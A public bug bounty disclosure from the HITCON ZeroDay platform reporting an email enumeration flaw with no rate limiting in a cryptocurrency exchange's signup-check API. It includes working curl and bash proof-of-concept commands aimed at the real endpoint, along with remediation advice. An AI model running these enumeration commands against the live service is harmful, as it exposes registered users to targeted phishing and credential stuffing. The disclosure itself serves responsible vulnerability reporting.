[Bounty] 帳號列舉漏洞（無 Rate Limiting）

Vulnerability Overview

ZDID: ZD-2026-00475
發信 Vendor: 現代財富科技有限公司
Title: [Bounty] 帳號列舉漏洞（無 Rate Limiting）
Introduction: target url signup/check 端點允許未認證大規模列舉已註冊 email，無 rate limiting 且繞過 Cloudflare

處理狀態

目前狀態

公開

Last Update : 2026/05/31

新提交
已審核
已通報
未回報修補狀況
未複測
公開

處理歷程

2026/03/31 01:16:44 : 新提交 (由鄉民更新此狀態)
2026/03/31 17:56:31 : 審核中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2026/04/02 11:11:12 : 修補中 (由組織帳號更新此狀態)
2026/05/31 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2026-00475
通報者：鄉民
風險：中
類型：資訊洩漏 (Information Leakage)

參考資料

攻擊者可利用洩漏資訊進行下一步攻擊行為。

OWASP 漏洞說明 (Top 10 2017 - A3 Sensitive Data Exposure)
https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure

CWE-200 漏洞說明
https://cwe.mitre.org/data/definitions/200.html

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

POST /api/mobile/signup/check 允許查詢任意 email 是否已註冊，回傳 is_registered 及 is_global 欄位。該端點在 max-api.maicoin.com 上繞過 Cloudflare JS challenge，且完全無 rate limiting。

PoC

1. 單一查詢：

curl -s -X POST https://max-api.maicoin.com/api/mobile/signup/check \
  -H "Content-Type: application/json" \
  -H "Client-ID: uWYf42fbk5QQumCjdeROvaZQwfHogz1yLncfh7x3W7E" \
  -d '{"email":"[email protected]"}'

{"is_registered":true,"is_global":true}

2. 無 Rate Limiting（50 requests / 13 秒）：

for i in $(seq 1 50); do
  curl -s -o /dev/null -w "%{http_code} " -X POST \
    https://max-api.maicoin.com/api/mobile/signup/check \
    -H "Content-Type: application/json" \
    -H "Client-ID: uWYf42fbk5QQumCjdeROvaZQwfHogz1yLncfh7x3W7E" \
    -d "{\"email\":\"test${i}@example.com\"}"
done

結果：50/50 全部 201，零節流。

3. Cloudflare 繞過：

max.maicoin.com 回傳 403 Cloudflare challenge，max-api.maicoin.com 直接回應 API 結果。

影響

攻擊者可大規模列舉平台註冊用戶 email 並區分國際/本地帳戶，用於針對性釣魚或撞庫攻擊。

修補建議

1. 加入 rate limiting
2. 無論是否已註冊回傳一致回應
3. 對 `max-api.maicoin.com` 套用相同 Cloudflare 安全等級

擷圖

留言討論

聯絡組織

發送私人訊息

您也可以透過私人訊息的方式與組織聯繫，討論有關於這個漏洞的相關資訊。

[Bounty] 帳號列舉漏洞（無 Rate Limiting） - HITCON ZeroDay

Vulnerability Detail Report